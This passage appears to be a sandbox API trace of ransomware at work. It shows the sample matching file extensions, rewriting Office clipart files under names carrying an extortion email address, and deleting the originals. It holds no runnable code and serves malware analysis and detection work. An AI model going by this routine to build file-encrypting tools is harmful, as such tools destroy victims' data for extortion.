[0064.930] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0064.930] lstrlenW (lpString=".dbf") returned 4 [0064.930] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0064.930] lstrlenW (lpString=".1cd") returned 4 [0064.930] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0064.930] lstrlenW (lpString=".jpg") returned 4 [0064.930] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.931] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.931] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.931] GetLastError () returned 0x0 [0064.931] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xb90, lpOverlapped=0x0) returned 1 [0064.939] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xba0, lpOverlapped=0x0) returned 1 [0064.940] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.940] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.940] SetEndOfFile (hFile=0x2c0) returned 1 [0064.941] CloseHandle (hObject=0x2c0) returned 1 [0064.941] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.941] SetEndOfFile (hFile=0x340) returned 1 [0064.942] CloseHandle (hObject=0x340) returned 1 [0064.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf")) returned 1 [0064.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 68 [0064.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 68 [0064.943] lstrlenW (lpString=".doc") returned 4 [0064.944] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.944] lstrlenW (lpString=".docx") returned 5 [0064.944] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.944] lstrlenW (lpString=".pdf") returned 4 [0064.944] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.944] lstrlenW (lpString=".xls") returned 4 [0064.944] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.944] lstrlenW (lpString=".xlsx") returned 5 [0064.944] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.944] lstrlenW (lpString=".ppt") returned 4 [0064.944] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 68 [0064.944] lstrlenW (lpString=".zip") returned 4 [0064.944] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.944] lstrlenW (lpString=".rar") returned 4 [0064.944] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.944] lstrlenW (lpString=".bz2") returned 4 [0064.944] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.944] lstrlenW (lpString=".7z") returned 3 [0064.944] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 68 [0064.944] lstrlenW (lpString=".dbf") returned 4 [0064.944] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 68 [0064.944] lstrlenW (lpString=".1cd") returned 4 [0064.944] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 68 [0064.944] lstrlenW (lpString=".jpg") returned 4 [0064.944] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.945] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.945] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.945] GetLastError () returned 0x0 [0064.945] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xe04, lpOverlapped=0x0) returned 1 [0064.948] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe10, lpOverlapped=0x0) returned 1 [0064.948] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.948] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.949] SetEndOfFile (hFile=0x2c0) returned 1 [0064.949] CloseHandle (hObject=0x2c0) returned 1 [0064.953] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.953] SetEndOfFile (hFile=0x340) returned 1 [0064.954] CloseHandle (hObject=0x340) returned 1 [0064.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.954] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf")) returned 1 [0064.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0064.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0064.955] lstrlenW (lpString=".doc") returned 4 [0064.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.955] lstrlenW (lpString=".docx") returned 5 [0064.955] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.955] lstrlenW (lpString=".pdf") returned 4 [0064.955] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.955] lstrlenW (lpString=".xls") returned 4 [0064.955] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.955] lstrlenW (lpString=".xlsx") returned 5 [0064.955] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.955] lstrlenW (lpString=".ppt") returned 4 [0064.955] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0064.955] lstrlenW (lpString=".zip") returned 4 [0064.955] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.955] lstrlenW (lpString=".rar") returned 4 [0064.955] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.955] lstrlenW (lpString=".bz2") returned 4 [0064.955] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.955] lstrlenW (lpString=".7z") returned 3 [0064.955] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0064.955] lstrlenW (lpString=".dbf") returned 4 [0064.955] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0064.955] lstrlenW (lpString=".1cd") returned 4 [0064.955] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 68 [0064.956] lstrlenW (lpString=".jpg") returned 4 [0064.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.957] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.957] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.959] GetLastError () returned 0x0 [0064.959] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x8b4, lpOverlapped=0x0) returned 1 [0064.986] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x8c0, lpOverlapped=0x0) returned 1 [0064.987] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.987] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.987] SetEndOfFile (hFile=0x2c0) returned 1 [0064.987] CloseHandle (hObject=0x2c0) returned 1 [0064.988] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.988] SetEndOfFile (hFile=0x340) returned 1 [0064.989] CloseHandle (hObject=0x340) returned 1 [0064.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.990] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf")) returned 1 [0064.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 68 [0064.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 68 [0064.990] lstrlenW (lpString=".doc") returned 4 [0064.990] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.990] lstrlenW (lpString=".docx") returned 5 [0064.990] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.990] lstrlenW (lpString=".pdf") returned 4 [0064.990] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.990] lstrlenW (lpString=".xls") returned 4 [0064.990] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.990] lstrlenW (lpString=".xlsx") returned 5 [0064.990] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.990] lstrlenW (lpString=".ppt") returned 4 [0064.990] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 68 [0064.991] lstrlenW (lpString=".zip") returned 4 [0064.991] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.991] lstrlenW (lpString=".rar") returned 4 [0064.991] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.991] lstrlenW (lpString=".bz2") returned 4 [0064.991] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.991] lstrlenW (lpString=".7z") returned 3 [0064.991] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 68 [0064.991] lstrlenW (lpString=".dbf") returned 4 [0064.991] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 68 [0064.991] lstrlenW (lpString=".1cd") returned 4 [0064.991] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 68 [0064.991] lstrlenW (lpString=".jpg") returned 4 [0064.991] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.991] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.992] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.992] GetLastError () returned 0x0 [0064.992] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x8fc, lpOverlapped=0x0) returned 1 [0065.350] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x900, lpOverlapped=0x0) returned 1 [0065.351] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.351] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.352] SetEndOfFile (hFile=0x2c0) returned 1 [0065.352] CloseHandle (hObject=0x2c0) returned 1 [0065.353] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.353] SetEndOfFile (hFile=0x340) returned 1 [0065.354] CloseHandle (hObject=0x340) returned 1 [0065.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf")) returned 1 [0065.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 68 [0065.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 68 [0065.355] lstrlenW (lpString=".doc") returned 4 [0065.355] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.355] lstrlenW (lpString=".docx") returned 5 [0065.355] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.355] lstrlenW (lpString=".pdf") returned 4 [0065.355] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.355] lstrlenW (lpString=".xls") returned 4 [0065.355] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.355] lstrlenW (lpString=".xlsx") returned 5 [0065.355] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.355] lstrlenW (lpString=".ppt") returned 4 [0065.355] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 68 [0065.355] lstrlenW (lpString=".zip") returned 4 [0065.355] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.355] lstrlenW (lpString=".rar") returned 4 [0065.355] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.355] lstrlenW (lpString=".bz2") returned 4 [0065.355] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.355] lstrlenW (lpString=".7z") returned 3 [0065.355] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 68 [0065.355] lstrlenW (lpString=".dbf") returned 4 [0065.356] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 68 [0065.356] lstrlenW (lpString=".1cd") returned 4 [0065.356] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 68 [0065.356] lstrlenW (lpString=".jpg") returned 4 [0065.356] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.356] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.356] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.357] GetLastError () returned 0x0 [0065.357] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x914, lpOverlapped=0x0) returned 1 [0065.368] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x920, lpOverlapped=0x0) returned 1 [0065.370] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.370] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.370] SetEndOfFile (hFile=0x2c0) returned 1 [0065.370] CloseHandle (hObject=0x2c0) returned 1 [0065.371] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.371] SetEndOfFile (hFile=0x340) returned 1 [0065.373] CloseHandle (hObject=0x340) returned 1 [0065.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.374] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf")) returned 1 [0065.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 68 [0065.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 68 [0065.374] lstrlenW (lpString=".doc") returned 4 [0065.375] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.375] lstrlenW (lpString=".docx") returned 5 [0065.375] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.375] lstrlenW (lpString=".pdf") returned 4 [0065.375] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.375] lstrlenW (lpString=".xls") returned 4 [0065.375] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.375] lstrlenW (lpString=".xlsx") returned 5 [0065.375] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.375] lstrlenW (lpString=".ppt") returned 4 [0065.375] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 68 [0065.375] lstrlenW (lpString=".zip") returned 4 [0065.375] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.375] lstrlenW (lpString=".rar") returned 4 [0065.375] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.375] lstrlenW (lpString=".bz2") returned 4 [0065.375] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.375] lstrlenW (lpString=".7z") returned 3 [0065.375] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 68 [0065.375] lstrlenW (lpString=".dbf") returned 4 [0065.375] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 68 [0065.375] lstrlenW (lpString=".1cd") returned 4 [0065.375] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 68 [0065.375] lstrlenW (lpString=".jpg") returned 4 [0065.375] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.387] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.387] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0065.395] GetLastError () returned 0x0 [0065.395] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4a7c, lpOverlapped=0x0) 